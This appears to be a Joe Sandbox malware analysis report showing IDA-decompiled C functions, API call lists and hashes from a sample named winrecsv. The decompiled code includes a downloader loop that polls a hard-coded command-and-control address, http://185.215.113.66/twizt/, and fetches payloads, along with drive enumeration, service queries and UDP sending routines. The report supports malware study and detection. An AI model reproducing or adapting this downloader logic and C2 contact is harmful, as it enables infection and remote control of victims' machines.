                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"serviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                  			}




                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction ID: 5740a4334c3a4aa6fa35b80b2035fb24052f91dcc8a06d59cd48ed0533e674c8
                                                                                  • Opcode Fuzzy Hash: 2ad81bc995ad7532411eb17437b6a81be3deee78c5c6ba789c4b43dcb7fff361
                                                                                  • Instruction Fuzzy Hash: 5731EA74A0020ADFCB14CF99D885BEFB7B5BF88304F108669E515B7390D778A985CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004048C0() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				long _v20;
                                                                                  				signed int _v24;
                                                                                  				void* _v28;
                                                                                  				char _v32;
                                                                                  				int _v36;
                                                                                  				void* _t44;
                                                                                  
                                                                                  				_v20 = GetLogicalDrives();
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0x80000002;
                                                                                  				_v8 = 0x80000001;
                                                                                  				_v24 = 0;
                                                                                  				while(_v24 < 2) {
                                                                                  					if(RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28) == 0) {
                                                                                  						_v32 = 0;
                                                                                  						_v36 = 4;
                                                                                  						if(RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36) == 0 && _v32 != 0) {
                                                                                  							_v16 = _v16 | _v32;
                                                                                  						}
                                                                                  						RegCloseKey(_v28);
                                                                                  					}
                                                                                  					_v24 = _v24 + 1;
                                                                                  				}
                                                                                  				return  !_v16 & _v20;
                                                                                  			}












                                                                                  APIs
                                                                                  • GetLogicalDrives.KERNEL32 ref: 004048C6
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                  • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  Strings
                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00404907
                                                                                  • NoDrives, xrefs: 00404938
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                  • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                  • API String ID: 2666887985-3471754645
                                                                                  • Opcode ID: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction ID: 2b22d0c5c2d49d9c8cdb046828b539e9dc82b3d10e46f6989da5e31515f8ca9d
                                                                                  • Opcode Fuzzy Hash: ff4268d8e916e307594962af17df6f2c266081f4fa44dda94cb6f84f4e563840
                                                                                  • Instruction Fuzzy Hash: 8411FCB5E4020A9BDF10DFD0D945BEFBBB4BB48704F108129E611B7280D7B85A45CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D7F0(char* _a4, intOrPtr* _a8) {
                                                                                  				void* _v8;
                                                                                  				char _v9;
                                                                                  				void* _v16;
                                                                                  				void _v20;
                                                                                  				long _v24;
                                                                                  
                                                                                  				_v9 = 0;
                                                                                  				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 1, 0, 0, 0);
                                                                                  				if(_v16 != 0) {
                                                                                  					_v8 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0);
                                                                                  					if(_v8 != 0) {
                                                                                  						_v24 = 4;
                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                  							 *_a8 = _v20;
                                                                                  							_v9 = 1;
                                                                                  						}
                                                                                  						InternetCloseHandle(_v8);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v16);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}








                                                                                  APIs
                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D807
                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D826
                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D84F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D878
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D882
                                                                                  Strings
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuery
                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 3871184103-2352012373
                                                                                  • Opcode ID: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction ID: 266a7dd59df556f887e0a4dfc4e5eaf5996777bbeb911e957400ba413950654c
                                                                                  • Opcode Fuzzy Hash: 6a61b89792010d5137e947f11a542a7cbeedc3085e70793a22fad245e61e0421
                                                                                  • Instruction Fuzzy Hash: 1A110A75E40208ABDB10DFD4CC49FDEB7B5AB08700F1085A5F9116B2D0C7B5AA44CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 97%
                                                                                  			E00404580(intOrPtr _a12, intOrPtr _a16) {
                                                                                  				signed int _v5;
                                                                                  				void* _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				long _v36;
                                                                                  				signed char _t76;
                                                                                  				void* _t79;
                                                                                  				intOrPtr _t87;
                                                                                  				intOrPtr _t88;
                                                                                  				signed char _t91;
                                                                                  				signed int _t141;
                                                                                  				void* _t158;
                                                                                  				void* _t159;
                                                                                  				void* _t160;
                                                                                  				void* _t169;
                                                                                  
                                                                                  				_v5 = 0;
                                                                                  				EnterCriticalSection(0x4143f0);
                                                                                  				_t111 = _a12;
                                                                                  				_t76 = E0040B550(_a12, _a16);
                                                                                  				_t159 = _t158 + 8;
                                                                                  				if((_t76 & 0x000000ff) != 0) {
                                                                                  					_t79 = E0040B4F0(_t111, _a12);
                                                                                  					_t160 = _t159 + 4;
                                                                                  					_v12 = _t79;
                                                                                  					if(_v12 != 0) {
                                                                                  						_v5 = 1;
                                                                                  						_v13 = 0;
                                                                                  						_v20 = 0;
                                                                                  						while(1) {
                                                                                  							_t169 = _v20 -  *0x41440c; // 0x0
                                                                                  							if(_t169 >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_v24 = _v20 * 0x110 +  *0x414408;
                                                                                  							if( *((intOrPtr*)(_v24 + 4)) ==  *((intOrPtr*)(_v12 + 4))) {
                                                                                  								memcpy(_v24, _v12, 0x40 << 2);
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x108)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00409020(_a12, _a16);
                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                  								E00408FB0( *((intOrPtr*)(_v24 + 0x100)));
                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040AE60( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                  								E004058A0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                  								_t160 = _t160 + 0x3c;
                                                                                  								_v13 = 1;
                                                                                  							} else {
                                                                                  								_v20 = _v20 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                  							_t91 = E004040F0(_a16, _v12, _a12, _a16, 1);
                                                                                  							_t160 = _t160 + 0x10;
                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                  								 *0x41440c = 0;
                                                                                  								_v5 = 0;
                                                                                  							}
                                                                                  						}
                                                                                  						E00408FB0(_v12);
                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                  							_v28 = CreateFileW(0x414620, 0x40000000, 0, 0, 2, 2, 0);
                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                  							if(_v28 != 0xffffffff) {
                                                                                  								_v32 = 0;
                                                                                  								while(1) {
                                                                                  									__eflags = _v32 -  *0x41440c; // 0x0
                                                                                  									if(__eflags >= 0) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t87 =  *0x414408; // 0x0
                                                                                  									_t88 =  *0x414408; // 0x0
                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0);
                                                                                  									_t141 = _v32 + 1;
                                                                                  									__eflags = _t141;
                                                                                  									_v32 = _t141;
                                                                                  								}
                                                                                  								FlushFileBuffers(_v28);
                                                                                  								CloseHandle(_v28);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection(0x4143f0);
                                                                                  				return _v5;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 00404591
                                                                                  • CreateFileW.KERNEL32(00414620,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A827,006A0266), ref: 00404740
                                                                                  • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004047A2
                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047AE
                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004047B8
                                                                                  • LeaveCriticalSection.KERNEL32(004143F0,?,?,00000000,0040A827,006A0266,?,0040A843,00000000,0040BBCC,?), ref: 004047C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                  • String ID:
                                                                                  • API String ID: 2945370292-0
                                                                                  • Opcode ID: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction ID: 01e06390de1b97125c550d85264ffb387e1c01f9fade460cde3dda761564bb80
                                                                                  • Opcode Fuzzy Hash: caf4a17dc1b5ade93e0efca01727ae95d05e7746645e07fd8e4cb04803bae3b0
                                                                                  • Instruction Fuzzy Hash: 4A71A3B5A00209ABCB04CF94D985FEFB7B5BB88304F148169E505B7382D779A941CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040BF50(signed int* _a4, long _a8, _Unknown_base(*)()* _a12, void* _a16, DWORD* _a20, HANDLE* _a24) {
                                                                                  				long _v8;
                                                                                  				signed int* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _t49;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				if(_a4 == 0) {
                                                                                  					L8:
                                                                                  					return _v8;
                                                                                  				}
                                                                                  				_v12 = _a4;
                                                                                  				EnterCriticalSection( &(_v12[1]));
                                                                                  				E0040BED0( &(_v12[1]), _v12);
                                                                                  				if(_a12 != 0) {
                                                                                  					_v12[7] = E00408EA0(_v12[7], 4 +  *_v12 * 4, _v12[7], 4 +  *_v12 * 4);
                                                                                  					if(_v12[7] != 0) {
                                                                                  						_v16 = CreateThread(0, _a8, _a12, _a16, 0, _a20);
                                                                                  						if(_v16 != 0) {
                                                                                  							 *((intOrPtr*)(_v12[7] +  *_v12 * 4)) = _v16;
                                                                                  							 *_v12 =  *_v12 + 1;
                                                                                  							if(_a24 != 0) {
                                                                                  								_t49 = GetCurrentProcess();
                                                                                  								DuplicateHandle(GetCurrentProcess(), _v16, _t49, _a24, 0, 0, 2);
                                                                                  							}
                                                                                  							_v8 = 1;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				LeaveCriticalSection( &(_v12[1]));
                                                                                  				goto L8;
                                                                                  			}

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040BF74
                                                                                    • Part of subcall function 0040BED0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040BF10
                                                                                    • Part of subcall function 0040BED0: CloseHandle.KERNEL32(?), ref: 0040BF29
                                                                                  • CreateThread.KERNEL32 ref: 0040BFCF
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C00C
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040C017
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 0040C01E
                                                                                  • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040C032
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2251373460-0
                                                                                  • Opcode ID: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction ID: 5aaab35954c252b20d942d79868cba7d8a41f7cfd36b01251640d95963f0b6d7
                                                                                  • Opcode Fuzzy Hash: d9072ebd16b6812de4560c3d06914d0ae5d8c789f3c20ec82b6015f19e15eb00
                                                                                  • Instruction Fuzzy Hash: 23311E74A00208EFDB04DF94D889F9EBBB5FF48314F1081A9E905A7391D779AA81CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00407CC0(signed int _a4, signed int _a8) {
                                                                                  
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 | _a4;
                                                                                  				_a8 = _a8 | _a8;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x0000ffff | _a4 & 0xffff0000;
                                                                                  				_a8 = _a8 & 0x0000ffff | _a8 & 0xffff0000;
                                                                                  				L0040F19E();
                                                                                  				L0040F198();
                                                                                  				_a4 = _a4 & 0x00ff00ff | _a4 & 0xff00ff00;
                                                                                  				_a8 = _a8 & 0x00ff00ff | _a8 & 0xff00ff00;
                                                                                  				return _a4;
                                                                                  			}

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl_aullshr
                                                                                  • String ID:
                                                                                  • API String ID: 673498613-0
                                                                                  • Opcode ID: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction ID: 2c2ab6fddce176d3a51b6a04538834b606437382d20241cd374fb35f0ceee124
                                                                                  • Opcode Fuzzy Hash: 10d828046bdec3bb739cc6049cde8a14431ccfa9158b05d7d18409f95d473af6
                                                                                  • Instruction Fuzzy Hash: B8111F32504518AB8B20EF5EC88268ABBD6EF84361B15C136FC2CDF759D634D9514BD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 91%
                                                                                  			E00405900() {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				signed int _v44;
                                                                                  				char _v148;
                                                                                  				intOrPtr _v152;
                                                                                  				intOrPtr _v156;
                                                                                  				intOrPtr _v160;
                                                                                  				intOrPtr _v164;
                                                                                  				intOrPtr _v168;
                                                                                  				intOrPtr _v172;
                                                                                  				signed int _v176;
                                                                                  				signed char _t36;
                                                                                  				void* _t46;
                                                                                  				void* _t47;
                                                                                  
                                                                                  				_v44 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v28 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v172 = 0x411138;
                                                                                  				_v168 = 0x41113c;
                                                                                  				_v164 = 0x411140;
                                                                                  				_v160 = 0x411144;
                                                                                  				_v156 = 0x411148;
                                                                                  				_v152 = 0x41114c;
                                                                                  				while(1) {
                                                                                  					Sleep(0x3e8);
                                                                                  					_v176 = 0;
                                                                                  					while(_v176 < 6) {
                                                                                  						Sleep(0x3e8);
                                                                                  						_push( *((intOrPtr*)(_t46 + _v176 * 4 - 0xa8)));
                                                                                  						_push("http://185.215.113.66/twizt/");
                                                                                  						wsprintfA( &_v148, "%s%s");
                                                                                  						_t36 = E0040D7F0( &_v148, _t46 + _v176 * 4 - 0x28);
                                                                                  						_t47 = _t47 + 0x18;
                                                                                  						if((_t36 & 0x000000ff) == 1) {
                                                                                  							E0040D890( &_v148, 0);
                                                                                  							_t47 = _t47 + 8;
                                                                                  						}
                                                                                  						_v176 = _v176 + 1;
                                                                                  					}
                                                                                  					Sleep(0xdbba0);
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$wsprintf
                                                                                  • String ID: %s%s$http://185.215.113.66/twizt/
                                                                                  • API String ID: 3195947292-3378761964
                                                                                  • Opcode ID: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction ID: 33ee1419d531fd34fd9c2865182aea181f8c03b5f59c5093f7aa5c1a3f23e5cd
                                                                                  • Opcode Fuzzy Hash: 073bb2fb0fef4dcd1ca273c0c354560f53e1d9e1eca1e683211fec216546dafb
                                                                                  • Instruction Fuzzy Hash: 7F2151B0D00318EFDB50DFA4CD45BDEBBB4BB09304F5081AAD64DB6281E7785A848F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E0040DF70(int __eax, long _a4, void* _a8, intOrPtr _a12, short _a16) {
                                                                                  				short _v6;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v20;
                                                                                  				short _v22;
                                                                                  				int* _v24;
                                                                                  				char _v25;
                                                                                  				char _v29;
                                                                                  				int* _v52;
                                                                                  				char _v53;
                                                                                  				short _t30;
                                                                                  				short _t35;
                                                                                  				long _t38;
                                                                                  				int* _t45;
                                                                                  				intOrPtr* _t50;
                                                                                  				void* _t60;
                                                                                  				int _t64;
                                                                                  				long _t67;
                                                                                  
                                                                                  				_t50 = _a4;
                                                                                  				_t64 = __eax;
                                                                                  				_t30 = 0;
                                                                                  				_v25 = 0;
                                                                                  				if(_t50 == 0 ||  *_t50 != 0x756470 || _a8 == 0 || __eax == 0) {
                                                                                  					L12:
                                                                                  					return _t30;
                                                                                  				} else {
                                                                                  					_t60 = __eax + 4;
                                                                                  					_t45 = E00408E60(_t60);
                                                                                  					_t6 =  &(_t45[1]); // 0x4
                                                                                  					_v24 = _t45;
                                                                                  					 *_t45 = _t64;
                                                                                  					memcpy(_t6, _a8, _t64);
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v10 = 0;
                                                                                  					_v6 = 0;
                                                                                  					_t35 = _a16;
                                                                                  					_v20 = 2;
                                                                                  					__imp__#9(_t35);
                                                                                  					_v22 = _t35;
                                                                                  					_v20 = _a12;
                                                                                  					if(_t60 == 0) {
                                                                                  						L10:
                                                                                  						_v29 = 1;
                                                                                  						E00408FB0(_t45);
                                                                                  						return _v29;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t38 = _a4;
                                                                                  							__imp__#20( *((intOrPtr*)(_t38 + 8)), _t45, _t60, 0,  &_v24, 0x10);
                                                                                  							_t67 = _t38;
                                                                                  							if(_t67 == 0xffffffff) {
                                                                                  								break;
                                                                                  							}
                                                                                  							InterlockedExchangeAdd(_a4 + 0x1c, _t67);
                                                                                  							_t60 = _t60 - _t67;
                                                                                  							_t45 = _t45 + _t67;
                                                                                  							if(_t60 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_v53 = 1;
                                                                                  								E00408FB0(_v52);
                                                                                  								return _v53;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						if(_t60 != 0) {
                                                                                  							E00408FB0(_v52);
                                                                                  							_t30 = _v53;
                                                                                  							goto L12;
                                                                                  						} else {
                                                                                  							_t45 = _v52;
                                                                                  							goto L10;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  			}

                                                                                  APIs
                                                                                  • memcpy.NTDLL(00000004,00000000,?,?), ref: 0040DFC7
                                                                                  • htons.WS2_32(?), ref: 0040DFF0
                                                                                  • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0040E018
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E02D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
